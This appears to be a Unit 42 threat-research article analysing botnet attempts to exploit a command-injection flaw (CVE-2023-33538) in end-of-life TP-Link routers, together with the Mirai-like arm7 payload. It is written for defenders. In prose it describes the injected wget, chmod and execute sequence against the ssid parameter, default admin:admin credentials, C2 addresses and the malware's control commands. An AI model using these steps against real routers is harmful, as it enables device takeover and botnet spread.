Threat Research Center Threat Research Vulnerabilities Vulnerabilities A Deep Dive Into Attempted Exploitation of CVE-2023-33538 17 min read Related Products Advanced DNS Security Advanced Threat Prevention Advanced URL Filtering Advanced WildFire Cloud-Delivered Security Services Cortex Cortex Xpanse Next-Generation Firewall Unit 42 Incident Response By: Asher Davila Malav Vyas Chris Navarrete Published: April 16, 2026 Categories: Threat Research Vulnerabilities Tags: Botnet Command injection CVE-2023-33538 Mirai WiFi routers Share Executive Summary We identified active, automated scans and probes attempting to exploit CVE-2023-33538 , a vulnerability in several end-of-life TP-Link Wi-Fi router models: TL-WR940N v2 and v4 TL-WR740N v1 and v2 TL-WR841N v8 and v10 The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices. We observed this activity after the Cybersecurity and Infrastructure Security Agency’s (CISA) June 2025 addition of this CVE (Common Vulnerabilities and Exposures) to its Known Exploited Vulnerabilities (KEV) Catalog . There has been some discussion of how impactful (or not) these active campaigns might have been. To address this, we conducted a deep-dive investigation by emulating the TP-Link TL-WR940N router. Using firmware emulation and reverse engineering, we analyzed whether the specific exploits observed in our telemetry could successfully use this vulnerability to deliver the payload on that device model. During our investigation, we uncovered two important facts about the attempted exploitation of this vulnerability: Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real Successful exploitation requires authentication to the router's web interface This research demonstrates that while active botnet attacks leverage flawed exploit code, the underlying vulnerability remains a practical infection vector due to the widespread use of default internet of things (IoT) credentials. TP-Link gave the following recommendation, regarding the devices and vulnerability in question: We confirm that the affected TP‑Link devices are end‑of‑life, and no vendor patches are available. Our recommendation to customers is to replace these units with supported hardware and ensure that default credentials are not used. Palo Alto Networks customers are better protected from the threats discussed in this article through the following products and services: Advanced URL Filtering and Advanced DNS Security Advanced WildFire Cortex Xpanse Device Security Next-Generation Firewall with Advanced Threat Prevention If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team . Related Unit 42 Topics Mirai , Wifi Routers , Command Injection Technical Analysis of Attempted Exploitation of CVE-2023-33538 CVE-2023-33538 was publicly reported in June 2023, affecting the aforementioned end-of-life TP-Link routers. Proof-of-concept (PoC) exploits for the different routers appeared earlier that month. The PoC exploits were removed from their original GitHub post but can be retrieved via Web Archive . According to the report, the /userRpm/WlanNetworkRpm endpoint contains a vulnerability in processing the ssid1 parameter sent through an HTTP GET request, because the parameter value is not sanitized when the Wi-Fi router processes it. Consequently, an attacker could send commands to this parameter. This would allow remote attackers to submit special requests, resulting in command injection and theoretically leading to arbitrary system command execution on the Wi-Fi router. Our Telemetry Findings Our telemetry systems detected active, large-scale exploitation attempts for CVE-2023-33538 around the time of the addition to the KEV catalog in June 2025. We observed multiple exploitation attempts similar to the example shown below in Figure 1. Figure 1. An example of an exploit attempt for CVE-2023-33538 that we observed in May 2025. These were GET requests toward the /userRpm/WlanNetworkRpm.htm endpoint, attempting to execute multiple commands in the ssid parameter: The first command uses wget to download an Executable and Linkable Format (ELF) binary named arm7 from the IP address 51.38.137[.]113 into the /tmp directory. The next command executes chmod 777 on the arm7 binary to grant the file read, write and execute permissions. The last command executes the saved binary at /tmp/arm7 with the parameter tplink . This set of commands is commonly associated with botnets, such as Mirai. These HTTP GET requests use Basic Authentication with the admin:admin credential encoded in Base64 ( YWRtaW46YWRtaW4= as shown in Figure 1). Malware Downloaded The arm7 binary found in our telemetry appears to be a Mirai variant. It is similar to the one used in the Condi IoT botnet , with multiple examples of the string condi in the file's code. Figure 2 shows an example of code from the arm7 binary showing the string condi2 . Figure 2. More references to Condi are present in the arm7 binary. In the main function's command processing loop, the arm7 binary waits for specific command sequences. The commands are received through the network socket connection. The data is stored in the buffer var_868 from the fd_serv function, which is the command-and-control (C2) server socket, as shown in Figure 3. Figure 3. Connection and command buffer of the arm7 binary shown in Radare2. After receiving data, the arm7 binary checks for specific byte patterns described below in Table 1. Command Sequence Purpose Action 0x99 0x66 0x33 Heartbeat Response Sends encrypted status string to C2 0x99 0x66 0x66 Lockdown/Termination Sets lockdown flag, exits if already set 0x33 0x66 0x99 HTTP Server Status Reports HTTP server status (only if running) 0x33 0x66 0x33 Conditional Update Downloads all top1hbt.* binaries (only if the HTTP server is active) 0x33 0x66 0x66 HTTP Server Start Starts HTTP server on random port (1024–64511) 0x66 0x66 0x99 Lockdown Flag Sets termination preparation flag Table 1. Control commands for the arm7 binary. Binary Update Mechanism When the binary updates itself, it first calls the update_bins("top1hbt.arm") function as shown in Figure 4. Figure 4. Full update routine in the arm7 binary, as shown in Binary Ninja’s decompiler. For the update, the arm7 binary iterates through an arch_names array, which contains a total of eight additional architectures (e.g., top1hbt.arm6 , top1hbt.mips ) and updates accordingly. For each update, the arm7 binary: Removes any previously existing file Connects to the C2 server Sends HTTP GET requests Downloads a fresh malware binary The update_bins() function contains the IP address and port hard-coded as observed in disassembled code from the arm7 binary shown in Figures 5 and 6. Figure 5. The update_bins function with a hard-coded IP address and port from the arm7 binary as shown in Binary Ninja. In Figure 5, the value 0x71892633 in little-endian corresponds to the IP address 51.38.137[.]113 and 0x5000 in little-endian for TCP port 80. Figure 6 shows the same IP address and port presented as \x00\x50 for TCP port 80 and \x33\x26\x89\x7 1 for 51.38.137[.]113 . Figure 6. Hard-coded IP address and port in the update_bins function (Disassembly View) showing the malware's C2 server details. The arm7 binary communicates with the C2 server at 51.38.137[.]113 , which also hosts the binary itself. This IP address is also associated with the domain ​​ cnc.vietdediserver[.]shop , which is a known, malicious domain associated with Mirai-like botnet campaigns. HTTP Server Start As part of the botnet, a host infected with the arm7 binary will act as a web server, which requires starting the HTTP daemon, httpd . For this HTTP server start procedure, the arm7 binary checks whether the flag for httpd_started is not set, meaning the httpd_start() function shown in Figure 7 has not been executed. Figure 7. HTTP server start function of the arm7 binary as shown in Binary Ninja’s decompiler. If the httpd_started is not set, the process generates a random value between 1024 and 65535 to use as a TCP port. It then calls httpd_start() to fork child processes. After that, the arm7 binary binds the TCP port number to a socket, listens for connections and performs a full binary update. When this happens, the process sets httpd_started flag value to 1. Finally, as an HTTP server, the infected botnet host serves malware binaries to requesting clients, which are other compromised devices. When the httpd_start() function is executed, it first forks a child process that immediately downloads fresh malware binaries for eight different CPU architectures, as shown in the function graph in Figure 8. Figure 8. httpd_start() function graph for the arm7 binary as shown in Binary Ninja. After successfully retrieving updated malware binaries from the server at 51.38.137[.]113 and storing them locally, the process establishes an HTTP server on a randomly assigned port. The process then creates a listening socket that accepts incoming connections from other devices on the network. Although we were unable to retrieve updated malware files from the original C2 server, we observed other samples with the same top1hbt prefix from other C2 servers. CVE-2023-33538 Exploit Analysis As noted earlier, the exploit attempts to compromise a vulnerable TP-Link device and infect it with the arm7 version, similar to the malware binary shown below in Figure 9. Figure 9. CVE-2023-33538 exploit attempt. The exploit attempt appears to contain errors. While the endpoint /userRpm/WlanNetworkRpm.htm is correct, this exploit is incorrectly attempting to inject malicious commands into the ssid parameter. The actual vulnerable parameter reported on the target system is ssid1 . To reproduce and analyze the vulnerability, we acquired the TP-Link WR940N US V4